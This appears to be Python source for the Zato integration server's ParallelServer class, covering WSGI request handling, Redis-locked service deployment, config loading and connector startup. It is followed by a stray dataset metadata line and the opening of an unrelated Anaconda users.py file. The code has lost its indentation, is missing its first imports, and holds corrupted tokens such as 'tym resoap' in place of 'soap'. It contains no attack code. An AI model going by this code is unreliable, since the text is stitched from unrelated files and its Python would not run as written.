from pytz import UTC
# Spring Python
from springpython.context import DisposableObject
# retools
from retools.lock import Lock
# tzlocal
from tzlocal import get_localzone
# Zato
from zato.broker.client import BrokerClient
from zato.common import ACCESS_LOG_DT_FORMAT, KVDB, MISC, SERVER_JOIN_STATUS, SERVER_UP_STATUS,\
ZATO_ODB_POOL_NAME
from zato.common.broker_message import AMQP_CONNECTOR, code_to_name, HOT_DEPLOY, JMS_WMQ_CONNECTOR, MESSAGE_TYPE, TOPICS, \
ZMQ_CONNECTOR
from zato.common.pubsub import PubSubAPI, RedisPubSub
from zato.common.util import add_startup_jobs, get_kvdb_config_for_log, hot_deploy, \
invoke_startup_services as _invoke_startup_services, new_cid, StaticConfig, register_diag_handlers
from zato.server.base import BrokerMessageReceiver
from zato.server.base.worker import WorkerStore
from zato.server.config import ConfigDict, ConfigStore
from zato.server.connection.amqp.channel import start_connector as amqp_channel_start_connector
from zato.server.connection.amqp.outgoing import start_connector as amqp_out_start_connector
from zato.server.connection.jms_wmq.channel import start_connector as jms_wmq_channel_start_connector
from zato.server.connection.jms_wmq.outgoing import start_connector as jms_wmq_out_start_connector
from zato.server.connection.zmq_.channel import start_connector as zmq_channel_start_connector
from zato.server.pickup import get_pickup
logger = logging.getLogger(__name__)
kvdb_logger = logging.getLogger('zato_kvdb')
class ParallelServer(DisposableObject, BrokerMessageReceiver):
def __init__(self):
self.host = None
self.port = None
self.crypto_manager = None
self.odb = None
self.odb_data = None
self.singleton_server = None
self.config = None
self.repo_location = None
self.sql_pool_store = None
self.int_parameters = None
self.int_parameter_suffixes = None
self.bool_parameter_prefixes = None
self.soap11_content_type = None
self.soap12_content_type = None
self.plain_xml_content_type = None
self.json_content_type = None
self.internal_service_modules = None # Zato's own internal services
self.service_modules = None # Set programmatically in Spring
self.service_sources = None # Set in a config file
self.base_dir = None
self.tls_dir = None
self.hot_deploy_config = None
self.pickup = None
self.fs_server_config = None
self.connector_server_grace_time = None
self.id = None
self.name = None
self.cluster_id = None
self.kvdb = None
self.startup_jobs = None
self.worker_store = None
self.deployment_lock_expires = None
self.deployment_lock_timeout = None
self.app_context = None
self.has_gevent = None
self.delivery_store = None
self.static_config = None
self.component_enabled = Bunch()
self.client_address_headers = ['HTTP_X_ZATO_FORWARDED_FOR', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR']
self.broker_client = None
# Allows users store arbitrary data across service invocations
self.user_ctx = Bunch()
self.user_ctx_lock = gevent.lock.RLock()
self.access_logger = logging.getLogger('zato_access_log')
# The main config store
self.config = ConfigStore()
gevent.signal(signal.SIGINT, self.destroy)
def on_wsgi_request(self, wsgi_environ, start_response, **kwargs):
""" Handles incoming HTTP requests.
"""
cid = kwargs.get('cid', new_cid())
wsgi_environ['zato.local_tz'] = get_localzone()
wsgi_environ['zato.request_timestamp_utc'] = utcnow()
local_dt = wsgi_environ['zato.request_timestamp_utc'].replace(tzinfo=UTC).astimezone(wsgi_environ['zato.local_tz'])
wsgi_environ['zato.request_timestamp'] = wsgi_environ['zato.local_tz'].normalize(local_dt)
wsgi_environ['zato.http.response.headers'] = {'X-Zato-CID': cid}
remote_addr = '(None)'
for name in self.client_address_headers:
remote_addr = wsgi_environ.get(name)
if remote_addr:
break
wsgi_environ['zato.http.remote_addr'] = remote_addr
try:
payload = self.worker_store.request_dispatcher.dispatch(
cid, datetime.utcnow(), wsgi_environ, self.worker_store) or b''
# Any exception at this point must be our fault
except Exception, e:
tb = format_exc(e)
wsgi_environ['zato.http.response.status'] = b'{} {}'.format(INTERNAL_SERVER_ERROR, responses[INTERNAL_SERVER_ERROR])
error_msg = b'[{0}] Exception caught [{1}]'.format(cid, tb)
logger.error(error_msg)
payload = error_msg
raise
# Note that this call is asynchronous and we do it the last possible moment.
if wsgi_environ['zato.http.channel_item'] and wsgi_environ['zato.http.channel_item'].get('audit_enabled'):
self.worker_store.request_dispatcher.url_data.audit_set_response(
cid, payload, wsgi_environ)
headers = [(k.encode('utf-8'), v.encode('utf-8')) for k, v in wsgi_environ['zato.http.response.headers'].items()]
start_response(wsgi_environ['zato.http.response.status'], headers)
if isinstance(payload, unicode):
payload = payload.encode('utf-8')
if self.access_logger.isEnabledFor(INFO):
channel_item = wsgi_environ.get('zato.http.channel_item')
if channel_item:
channel_name = channel_item.get('name', '-')
else:
channel_name = '-'
self.access_logger.info('', extra = {
'remote_ip': wsgi_environ['zato.http.remote_addr'],
'cid_resp_time': '{}/{}'.format(cid, (utcnow() - wsgi_environ['zato.request_timestamp_utc']).total_seconds()),
'channel_name': channel_name,
'req_timestamp_utc': wsgi_environ['zato.request_timestamp_utc'].strftime(ACCESS_LOG_DT_FORMAT),
'req_timestamp': wsgi_environ['zato.request_timestamp'].strftime(ACCESS_LOG_DT_FORMAT),
'method': wsgi_environ['REQUEST_METHOD'],
'path': wsgi_environ['PATH_INFO'],
'http_version': wsgi_environ['SERVER_PROTOCOL'],
'status_code': wsgi_environ['zato.http.response.status'].split()[0],
'response_size': len(payload),
'user_agent': wsgi_environ.get('HTTP_USER_AGENT', '(None)'),
})
return [payload]
def deploy_missing_services(self, locally_deployed):
""" Deploys services that exist on other servers but not on ours.
"""
# The locally_deployed list are all the services that we could import based on our current
# understanding of the contents of the cluster. However, it's possible that we have
# been shut down for a long time and during that time other servers deployed services
# we don't know anything about. They are not stored locally because we were down.
# Hence we need to check out if there are any other servers in the cluster and if so,
# grab their list of services, compare it with what we have deployed and deploy
# any that are missing.
# Continue only if there is more than one running server in the cluster.
other_servers = self.odb.get_servers()
if other_servers:
other_server = other_servers[0] # Index 0 is as random as any other because the list is not sorted.
missing = self.odb.get_missing_services(other_server, locally_deployed)
if missing:
logger.info('Found extra services to deploy: %s', ', '.join(sorted(item.name for item in missing)))
for service_id, name, source_path, source in missing:
file_name = os.path.basename(source_path)
_, full_path = mkstemp(suffix='-'+ file_name)
f = open(full_path, 'wb')
f.write(source)
f.close()
# Create a deployment package in ODB out of which all the services will be picked up ..
msg = Bunch()
msg.action = HOT_DEPLOY.CREATE.value
msg.msg_type = MESSAGE_TYPE.TO_PARALLEL_ALL
msg.package_id = hot_deploy(self, file_name, full_path, notify=False)
# .. and tell the worker to actually deploy all the services the package contains.
gevent.spawn(self.worker_store.on_broker_msg_HOT_DEPLOY_CREATE, msg)
logger.info('Deployed an extra service found: %s (%s)', name, service_id)
def maybe_on_first_worker(self, server, redis_conn, deployment_key):
""" This method will execute code with a Redis lock held. We need a lock
because we can have multiple worker processes fighting over the right to
redeploy services. The first worker to grab the lock will actually perform
the redeployment and set a flag meaning that for this particular deployment
key (and remember that each server restart means a new deployment key)
the services have been already deployed. Later workers will check that
the flag exists and will skip the deployment altogether.
The first worker to be started will also start a singleton thread later on,
outside this method but basing on whether the method returns True or not.
"""
def import_initial_services_jobs():
# (re-)deploy the services from a clear state
locally_deployed = self.service_store.import_services_from_anywhere(
self.internal_service_modules + self.service_modules +
self.service_sources, self.base_dir)
# Add the statistics-related scheduler jobs to the ODB
add_startup_jobs(self.cluster_id, self.odb, self.startup_jobs)
# Migrations
self.odb.add_channels_2_0()
return set(locally_deployed)
lock_name = '{}{}:{}'.format(KVDB.LOCK_SERVER_STARTING, self.fs_server_config.main.token, deployment_key)
already_deployed_flag = '{}{}:{}'.format(KVDB.LOCK_SERVER_ALREADY_DEPLOYED,
self.fs_server_config.main.token, deployment_key)
logger.debug('Will use the lock_name: [{}]'.format(lock_name))
with Lock(lock_name, self.deployment_lock_expires, self.deployment_lock_timeout, redis_conn):
if redis_conn.get(already_deployed_flag):
# There has been already the first worker who's done everything
# there is to be done so we may just return.
msg = 'Not attempting to grab the lock_name:[{}]'.format(lock_name)
logger.debug(msg)
# Simply deploy services, including any missing ones, the first worker has already cleared out the ODB
locally_deployed = import_initial_services_jobs()
return False, locally_deployed
else:
# We are this server's first worker so we need to re-populate
# the database and create the flag indicating we're done.
msg = 'Got Redis lock_name:[{}], expires:[{}], timeout:[{}]'.format(
lock_name, self.deployment_lock_expires, self.deployment_lock_timeout)
logger.debug(msg)
# .. Remove all the deployed services from the DB ..
self.odb.drop_deployed_services(server.id)
# .. deploy them back including any missing ones found on other servers.
locally_deployed = import_initial_services_jobs()
# Add the flag to Redis indicating that this server has already
# deployed its services. Note that by default the expiration
# time is more than a century in the future. It will be cleared out
# next time the server will be started. This also means that when
# a process dies and it's the one holding the singleton thread,
# no other process will be able to start the singleton thread
# until the server is fully restarted so that the locks are cleared.
redis_conn.set(already_deployed_flag, dumps({'create_time_utc':datetime.utcnow().isoformat()}))
redis_conn.expire(already_deployed_flag, self.deployment_lock_expires)
return True, locally_deployed
def get_lua_programs(self):
for item in 'internal', 'user':
dir_name = os.path.join(self.repo_location, 'lua', item)
for file_name in os.listdir(dir_name):
lua_idx = file_name.find('.lua')
name = file_name[0:lua_idx] if lua_idx else file_name
program = open(os.path.join(dir_name, file_name)).read()
yield [name, program]
def _after_init_common(self, server, deployment_key):
""" Initializes parts of the server that don't depend on whether the
server's been allowed to join the cluster or not.
"""
self.worker_store = WorkerStore(self.config, self)
self.worker_store.invoke_matcher.read_config(self.fs_server_config.invoke_patterns_allowed)
self.worker_store.target_matcher.read_config(self.fs_server_config.invoke_target_patterns_allowed)
# Patterns to match during deployment
self.service_store.patterns_matcher.read_config(self.fs_server_config.deploy_patterns_allowed)
# Static config files
self.static_config = StaticConfig(os.path.join(self.repo_location, 'static'))
# Key-value DB
kvdb_config = get_kvdb_config_for_log(self.fs_server_config.kvdb)
kvdb_logger.info('Worker config `%s`', kvdb_config)
self.kvdb.config = self.fs_server_config.kvdb
self.kvdb.server = self
self.kvdb.decrypt_func = self.crypto_manager.decrypt
self.kvdb.init()
kvdb_logger.info('Worker config `%s`', kvdb_config)
# Lua programs, both internal and user defined ones.
for name, program in self.get_lua_programs():
self.kvdb.lua_container.add_lua_program(name, program)
# Service sources
self.service_sources = []
for name in open(os.path.join(self.repo_location, self.fs_server_config.main.service_sources)):
name = name.strip()
if name and not name.startswith('#'):
self.service_sources.append(name)
# Normalize hot-deploy configuration
self.hot_deploy_config = Bunch()
self.hot_deploy_config.work_dir = os.path.normpath(os.path.join(
self.repo_location, self.fs_server_config.hot_deploy.work_dir))
self.hot_deploy_config.backup_history = int(self.fs_server_config.hot_deploy.backup_history)
self.hot_deploy_config.backup_format = self.fs_server_config.hot_deploy.backup_format
for name in('current_work_dir', 'backup_work_dir', 'last_backup_work_dir', 'delete_after_pick_up'):
# New in 2.0
if name == 'delete_after_pick_up':
value = asbool(self.fs_server_config.hot_deploy.get(name, True))
self.hot_deploy_config[name] = value
else:
self.hot_deploy_config[name] = os.path.normpath(os.path.join(
self.hot_deploy_config.work_dir, self.fs_server_config.hot_deploy[name]))
is_first, locally_deployed = self.maybe_on_first_worker(server, self.kvdb.conn, deployment_key)
if is_first:
self.singleton_server = self.app_context.get_object('singleton_server')
self.singleton_server.initial_sleep_time = int(self.fs_server_config.singleton.initial_sleep_time) / 1000.0
self.singleton_server.parallel_server = self
_pickup_dir = self.fs_server_config.hot_deploy.pickup_dir
fs_pickup_dir = [_pickup_dir] if isinstance(_pickup_dir, basestring) else _pickup_dir
pickup_dir = []
for item in fs_pickup_dir:
if not os.path.isabs(item):
item = os.path.abspath(os.path.join(self.repo_location, item))
pickup_dir.append(item)
self.singleton_server.pickup = get_pickup(self.has_gevent)
self.singleton_server.pickup.pickup_dir = pickup_dir
self.singleton_server.pickup.pickup_event_processor.pickup_dir = pickup_dir
self.singleton_server.pickup.pickup_event_processor.server = self.singleton_server
self.singleton_server.server_id = server.id
return is_first, locally_deployed
def _after_init_accepted(self, server, deployment_key, locally_deployed):
# Flag set to True if this worker is the cluster-wide singleton
is_singleton = False
# Which components are enabled
self.component_enabled.stats = asbool(self.fs_server_config.component_enabled.stats)
self.component_enabled.slow_response = asbool(self.fs_server_config.component_enabled.slow_response)
# Pub/sub
self.pubsub = PubSubAPI(RedisPubSub(self.kvdb.conn))
# Repo location so that AMQP subprocesses know where to read
# the server's configuration from.
self.config.repo_location = self.repo_location
#
# Cassandra - start
#
query = self.odb.get_cassandra_conn_list(server.cluster.id, True)
self.config.cassandra_conn = ConfigDict.from_query('cassandra_conn', query)
query = self.odb.get_cassandra_query_list(server.cluster.id, True)
self.config.cassandra_query = ConfigDict.from_query('cassandra_query', query)
#
# Cassandra - end
#
#
# Search - start
#
query = self.odb.get_search_es_list(server.cluster.id, True)
self.config.search_es = ConfigDict.from_query('search_es', query)
query = self.odb.get_search_solr_list(server.cluster.id, True)
self.config.search_solr = ConfigDict.from_query('search_solr', query)
#
# Search - end
#
#
# Cloud - start
#
# OpenStack - Swift
query = self.odb.get_cloud_openstack_swift_list(server.cluster.id, True)
self.config.cloud_openstack_swift = ConfigDict.from_query('cloud_openstack_swift', query)
query = self.odb.get_cloud_aws_s3_list(server.cluster.id, True)
self.config.cloud_aws_s3 = ConfigDict.from_query('cloud_aws_s3', query)
#
# Cloud - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Services
query = self.odb.get_service_list(server.cluster.id, True)
self.config.service = ConfigDict.from_query('service_list', query)
#
# Channels - start
#
# STOMP
query = self.odb.get_channel_stomp_list(server.cluster.id, True)
self.config.channel_stomp = ConfigDict.from_query('channel_stomp', query)
#
# Channels - end
#
#
# Outgoing connections - start
#
# AMQP
query = self.odb.get_out_amqp_list(server.cluster.id, True)
self.config.out_amqp = ConfigDict.from_query('out_amqp', query)
# FTP
query = self.odb.get_out_ftp_list(server.cluster.id, True)
self.config.out_ftp = ConfigDict.from_query('out_ftp', query)
# JMS WMQ
query = self.odb.get_out_jms_wmq_list(server.cluster.id, True)
self.config.out_jms_wmq = ConfigDict.from_query('out_jms_wmq', query)
# Odoo
query = self.odb.get_out_odoo_list(server.cluster.id, True)
self.config.out_odoo = ConfigDict.from_query('out_odoo', query)
# Plain HTTP
query = self.odb.get_http_soap_list(server.cluster.id, 'outgoing', 'plain_http', True)
self.config.out_plain_http = ConfigDict.from_query('out_plain_http', query)
# SOAP
query = self.odb.get_http_soap_list(server.cluster.id, 'outgoing', 'tym resoap', True)
self.config.out_soap = ConfigDict.from_query('out_soap', query)
# SQL
query = self.odb.get_out_sql_list(server.cluster.id, True)
self.config.out_sql = ConfigDict.from_query('out_sql', query)
# STOMP
query = self.odb.get_out_stomp_list(server.cluster.id, True)
self.config.out_stomp = ConfigDict.from_query('out_stomp', query)
# ZMQtym re
query = self.odb.get_out_zmq_list(server.cluster.id, True)
self.config.out_zmq = ConfigDict.from_query('out_zmq', query)
#
# Outgoing connections - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Notifications - start
#
# OpenStack Swift
query = self.odb.get_notif_cloud_openstack_swift_list(server.cluster.id, True)
self.config.notif_cloud_openstack_swift = ConfigDict.from_query('notif_cloud_openstack_swift', query)
# SQL
query = self.odb.get_notif_sql_list(server.cluster.id, True)
self.config.notif_sql = ConfigDict.from_query('notif_sql', query)
#
# Notifications - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Security - start
#
# API keys
query = self.odb.get_apikey_security_list(server.cluster.id, True)
self.config.apikey = ConfigDict.from_query('apikey', query)
# AWS
query = self.odb.get_aws_security_list(server.cluster.id, True)
self.config.aws = ConfigDict.from_query('aws', query)
# HTTP Basic Auth
query = self.odb.get_basic_auth_list(server.cluster.id, True)
self.config.basic_auth = ConfigDict.from_query('basic_auth', query)
# NTLM
query = self.odb.get_ntlm_list(server.cluster.id, True)
self.config.ntlm = ConfigDict.from_query('ntlm', query)
# OAuth
query = self.odb.get_oauth_list(server.cluster.id, True)
self.config.oauth = ConfigDict.from_query('oauth', query)
# OpenStack
query = self.odb.get_openstack_security_list(server.cluster.id, True)
self.config.openstack_security = ConfigDict.from_query('openstack_security', query)
# RBAC - permissions
query = self.odb.get_rbac_permission_list(server.cluster.id, True)
self.config.rbac_permission = ConfigDict.from_query('rbac_permission', query)
# RBAC - roles
query = self.odb.get_rbac_role_list(server.cluster.id, True)
self.config.rbac_role = ConfigDict.from_query('rbac_role', query)
# RBAC - client roles
query = self.odb.get_rbac_client_role_list(server.cluster.id, True)
self.config.rbac_client_role = ConfigDict.from_query('rbac_client_role', query)
# RBAC - role permission
query = self.odb.get_rbac_role_permission_list(server.cluster.id, True)
self.config.rbac_role_permission = ConfigDict.from_query('rbac_role_permission', query)
# Technical accounts
query = self.odb.get_tech_acc_list(server.cluster.id, True)
self.config.tech_acc = ConfigDict.from_query('tech_acc', query)
# TLS CA certs
query = self.odb.get_tls_ca_cert_list(server.cluster.id, True)
self.config.tls_ca_cert = ConfigDict.from_query('tls_ca_cert', query)
# TLS channel security
query = self.odb.get_tls_channel_sec_list(server.cluster.id, True)
self.config.tls_channel_sec = ConfigDict.from_query('tls_channel_sec', query)
# TLS key/cert pairs
query = self.odb.get_tls_key_cert_list(server.cluster.id, True)
self.config.tls_key_cert = ConfigDict.from_query('tls_key_cert', query)
# WS-Security
query = self.odb.get_wss_list(server.cluster.id, True)
self.config.wss = ConfigDict.from_query('wss', query)
# XPath
query = self.odb.get_xpath_sec_list(server.cluster.id, True)
self.config.xpath_sec = ConfigDict.from_query('xpath_sec', query)
#
# Security - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# All the HTTP/SOAP channels.
http_soap = []
for item in self.odb.get_http_soap_list(server.cluster.id, 'channel'):
hs_item = Bunch()
for key in item.keys():
hs_item[key] = getattr(item, key)
hs_item.replace_patterns_json_pointer = item.replace_patterns_json_pointer
hs_item.replace_patterns_xpath = item.replace_patterns_xpath
hs_item.match_target = '{}{}{}'.format(hs_item.soap_action, MISC.SEPARATOR, hs_item.url_path)
hs_item.match_target_compiled = parse_compile(hs_item.match_target)
http_soap.append(hs_item)
self.config.http_soap = http_soap
# Namespaces
query = self.odb.get_namespace_list(server.cluster.id, True)
self.config.msg_ns = ConfigDict.from_query('msg_ns', query)
# XPath
query = self.odb.get_xpath_list(server.cluster.id, True)
self.config.xpath = ConfigDict.from_query('msg_xpath', query)
# JSON Pointer
query = self.odb.get_json_pointer_list(server.cluster.id, True)
self.config.json_pointer = ConfigDict.from_query('json_pointer', query)
# SimpleIO
self.config.simple_io = ConfigDict('simple_io', Bunch())
self.config.simple_io['int_parameters'] = self.int_parameters
self.config.simple_io['int_parameter_suffixes'] = self.int_parameter_suffixes
self.config.simple_io['bool_parameter_prefixes'] = self.bool_parameter_prefixes
# Pub/sub config
self.config.pubsub = Bunch()
self.config.pubsub.default_consumer = Bunch()
self.config.pubsub.default_producer = Bunch()
query = self.odb.get_pubsub_topic_list(server.cluster.id, True)
self.config.pubsub.topics = ConfigDict.from_query('pubsub_topics', query)
id, name = self.odb.get_pubsub_default_client(server.cluster.id, 'zato.pubsub.default-consumer')
self.config.pubsub.default_consumer.id, self.config.pubsub.default_consumer.name = id, name
id, name = self.odb.get_pubsub_default_client(server.cluster.id, 'zato.pubsub.default-producer')
self.config.pubsub.default_producer.id, self.config.pubsub.default_producer.name = id, name
query = self.odb.get_pubsub_producer_list(server.cluster.id, True)
self.config.pubsub.producers = ConfigDict.from_query('pubsub_producers', query, list_config=True)
query = self.odb.get_pubsub_consumer_list(server.cluster.id, True)
self.config.pubsub.consumers = ConfigDict.from_query('pubsub_consumers', query, list_config=True)
# E-mail - SMTP
query = self.odb.get_email_smtp_list(server.cluster.id, True)
self.config.email_smtp = ConfigDict.from_query('email_smtp', query)
# E-mail - IMAP
query = self.odb.get_email_imap_list(server.cluster.id, True)
self.config.email_imap = ConfigDict.from_query('email_imap', query)
# Assign config to worker
self.worker_store.worker_config = self.config
self.worker_store.pubsub = self.pubsub
self.worker_store.init()
if self.singleton_server:
self.singleton_server.wait_for_worker()
# Let's see if we can become a connector server, the one to start all
# the connectors, and start the connectors only once throughout the whole cluster.
self.connector_server_keep_alive_job_time = int(
self.fs_server_config.singleton.connector_server_keep_alive_job_time)
self.connector_server_grace_time = int(
self.fs_server_config.singleton.grace_time_multiplier) * self.connector_server_keep_alive_job_time
if self.singleton_server.become_cluster_wide(
self.connector_server_keep_alive_job_time, self.connector_server_grace_time,
server.id, server.cluster_id, True):
self.init_connectors()
is_singleton = True
# Deployed missing services found on other servers
if locally_deployed:
self.deploy_missing_services(locally_deployed)
# Signal to ODB that we are done with deploying everything
self.odb.on_deployment_finished()
# Default content type
self.json_content_type = self.fs_server_config.content_type.json
self.plain_xml_content_type = self.fs_server_config.content_type.plain_xml
self.soap11_content_type = self.fs_server_config.content_type.soap11
self.soap12_content_type = self.fs_server_config.content_type.soap12
return is_singleton
def init_connectors(self):
""" Starts all the connector subprocesses.
"""
logger.info('Initializing connectors')
# AMQP - channels
channel_amqp_list = self.odb.get_channel_amqp_list(self.cluster_id)
if channel_amqp_list:
for item in channel_amqp_list:
if item.is_active:
amqp_channel_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive channel (AMQP {})'.format(item.name))
else:
logger.info('No AMQP channels to start')
# AMQP - outgoing
out_amqp_list = self.odb.get_out_amqp_list(self.cluster_id)
if out_amqp_list:
for item in out_amqp_list:
if item.is_active:
amqp_out_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive outgoing connection (AMQP {})'.format(item.name))
else:
logger.info('No AMQP outgoing connections to start')
# JMS WMQ - channels
channel_jms_wmq_list = self.odb.get_channel_jms_wmq_list(self.cluster_id)
if channel_jms_wmq_list:
for item in channel_jms_wmq_list:
if item.is_active:
jms_wmq_channel_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive channel (JMS WebSphere MQ {})'.format(item.name))
else:
logger.info('No JMS WebSphere MQ channels to start')
# JMS WMQ - outgoing
out_jms_wmq_list = self.odb.get_out_jms_wmq_list(self.cluster_id)
if out_jms_wmq_list:
for item in out_jms_wmq_list:
if item.is_active:
jms_wmq_out_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive outgoing connection (JMS WebSphere MQ {})'.format(item.name))
else:
logger.info('No JMS WebSphere MQ outgoing connections to start')
# ZMQ - channels
channel_zmq_list = self.odb.get_channel_zmq_list(self.cluster_id)
if channel_zmq_list:
for item in channel_zmq_list:
if item.is_active:
zmq_channel_start_connector(self.repo_location, item.id)
else:
logger.info('Not starting an inactive channel (ZeroMQ {})'.format(item.name))
else:
logger.info('No Zero MQ channels to start')
def _after_init_non_accepted(self, server):
raise NotImplementedError("This Zato version doesn't support join states other than ACCEPTED")
def get_config_odb_data(self, parallel_server):
""" Returns configuration with regards to ODB data.
"""
odb_data = Bunch()
odb_data.db_name = parallel_server.odb_data['db_name']
odb_data.extra = parallel_server.odb_data['extra']
odb_data.engine = parallel_server.odb_data['engine']
odb_data.token = parallel_server.fs_server_config.main.token
odb_data.is_odb = True
if odb_data.engine != 'sqlite':
odb_data.password = parallel_server.crypto_manager.decrypt(parallel_server.odb_data['password'])
odb_data.host = parallel_server.odb_data['host']
odb_data.port = parallel_server.odb_data['port']
odb_data.engine = parallel_server.odb_data['engine']
odb_data.pool_size = parallel_server.odb_data['pool_size']
odb_data.username = parallel_server.odb_data['username']
# Note that we don't read is_active off of anywhere - ODB always must
# be active and it's not a regular connection pool anyway.
odb_data.is_active = True
return odb_data
def set_odb_pool(self):
# This is the call that creates an SQLAlchemy connection
self.sql_pool_store[ZATO_ODB_POOL_NAME] = self.config.odb_data
self.odb.pool = self.sql_pool_store[ZATO_ODB_POOL_NAME].pool
self.odb.token = self.config.odb_data.token
@staticmethod
def start_server(parallel_server, zato_deployment_key=None):
# Will be set to True if this process is a singleton
is_singleton = False
# Will be None if we are not running in background.
if not zato_deployment_key:
zato_deployment_key = uuid4().hex
register_diag_handlers()
# Store the ODB configuration, create an ODB connection pool and have self.odb use it
parallel_server.config.odb_data = parallel_server.get_config_odb_data(parallel_server)
parallel_server.set_odb_pool()
# Now try grabbing the basic server's data from the ODB. No point
# in doing anything else if we can't get past this point.
server = parallel_server.odb.fetch_server(parallel_server.config.odb_data)
if not server:
raise Exception('Server does not exist in the ODB')
parallel_server.id = server.id
parallel_server.name = server.name
parallel_server.cluster_id = server.cluster_id
is_first, locally_deployed = parallel_server._after_init_common(server, zato_deployment_key)
# For now, all the servers are always ACCEPTED but future versions
# might introduce more join states
if server.last_join_status in(SERVER_JOIN_STATUS.ACCEPTED):
is_singleton = parallel_server._after_init_accepted(server, zato_deployment_key, locally_deployed)
else:
msg = 'Server has not been accepted, last_join_status:[{0}]'
logger.warn(msg.format(server.last_join_status))
parallel_server._after_init_non_accepted(server)
broker_callbacks = {
TOPICS[MESSAGE_TYPE.TO_PARALLEL_ANY]: parallel_server.worker_store.on_broker_msg,
TOPICS[MESSAGE_TYPE.TO_PARALLEL_ALL]: parallel_server.worker_store.on_broker_msg,
}
if is_first:
broker_callbacks[TOPICS[MESSAGE_TYPE.TO_SINGLETON]] = parallel_server.on_broker_msg_singleton
parallel_server.broker_client = BrokerClient(
parallel_server.kvdb, 'parallel', broker_callbacks, parallel_server.get_lua_programs())
parallel_server.worker_store.set_broker_client(parallel_server.broker_client)
if is_first:
kwargs = {'broker_client':parallel_server.broker_client}
Thread(target=parallel_server.singleton_server.run, kwargs=kwargs).start()
parallel_server.odb.server_up_down(server.token, SERVER_UP_STATUS.RUNNING, True,
parallel_server.host, parallel_server.port)
if is_first:
parallel_server.invoke_startup_services(is_first)
# We cannot do it earlier because we need the broker client and everything be ready
if is_singleton:
# Let's wait for the broker client to connect before continuing with anything
while not parallel_server.singleton_server.broker_client and parallel_server.singleton_server.broker_client.ready:
time.sleep(0.01)
parallel_server.singleton_server.init_scheduler()
parallel_server.singleton_server.init_notifiers()
def invoke_startup_services(self, is_first):
_invoke_startup_services(
'Parallel', 'startup_services_first_worker' if is_first else 'startup_services_any_worker',
self.fs_server_config, self.repo_location, self.broker_client, 'zato.notif.init-notifiers')
@staticmethod
def post_fork(arbiter, worker):
""" A Gunicorn hook which initializes the worker.
"""
ParallelServer.start_server(worker.app.zato_wsgi_app, arbiter.zato_deployment_key)
@staticmethod
def on_starting(arbiter):
""" A Gunicorn hook for setting the deployment key for this particular
set of server processes. It needs to be added to the arbiter because
we want for each worker to be (re-)started to see the same key.
"""
setattr(arbiter, 'zato_deployment_key', uuid4().hex)
def destroy(self):
""" A Spring Python hook for closing down all the resources held.
"""
if self.singleton_server:
# Close all the connector subprocesses this server has possibly started
pairs = ((AMQP_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_AMQP_CONNECTOR_ALL),
(JMS_WMQ_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_JMS_WMQ_CONNECTOR_ALL),
(ZMQ_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_ZMQ_CONNECTOR_ALL),
)
for action, msg_type in pairs:
msg = {}
msg['action'] = action
msg['token'] = self.odb.token
self.broker_client.publish(msg, msg_type=msg_type)
time.sleep(0.2)
# Broker client
self.broker_client.close()
# Scheduler
self.singleton_server.scheduler.stop()
# Pick-up processor
self.singleton_server.pickup.stop()
# Cluster-wide flags
if self.singleton_server.is_cluster_wide:
self.odb.clear_cluster_wide()
# Tell the ODB we've gone through a clean shutdown but only if this is
# the main process going down (Arbiter) not one of Gunicorn workers.
# We know it's the main process because its ODB's session has never
# been initialized.
if not self.odb.session_initialized:
self.config.odb_data = self.get_config_odb_data(self)
self.set_odb_pool()
self.odb.init_session(ZATO_ODB_POOL_NAME, self.config.odb_data, self.odb.pool, False)
self.odb.server_up_down(self.odb.token, SERVER_UP_STATUS.CLEAN_DOWN)
self.odb.close()
# Convenience API
stop = destroy
# ##############################################################################
def on_broker_msg_singleton(self, msg):
getattr(self.singleton_server, 'on_broker_msg_{}'.format(code_to_name[msg.action]))(msg)
# ##############################################################################
def notify_new_package(self, package_id):
""" Publishes a message on the broker so all the servers (this one including
can deploy a new package).
"""
msg = {'action': HOT_DEPLOY.CREATE.value, 'package_id': package_id}
self.broker_client.publish(msg)
| gpl-3.0 | 10,401,790,228,357,972 | 41.168912 | 130 | 0.621483 | false |
jkonecny12/anaconda | pyanaconda/core/users.py | 2 | 17675 | #
# users.py: Code for creating user accounts and setting the root password
#
# Copyright (C) 2006, 2007, 2008 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Used for ascii_letters and digits constants
import os
import os.path
import subprocess
from contextlib import contextmanager
from pyanaconda.core import util
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.core.util import strip_accents
from pyanaconda.core.regexes import GROUPLIST_FANCY_PARSE, NAME_VALID, PORTABLE_FS_CHARS, GROUPLIST_SIMPLE_VALID
import crypt
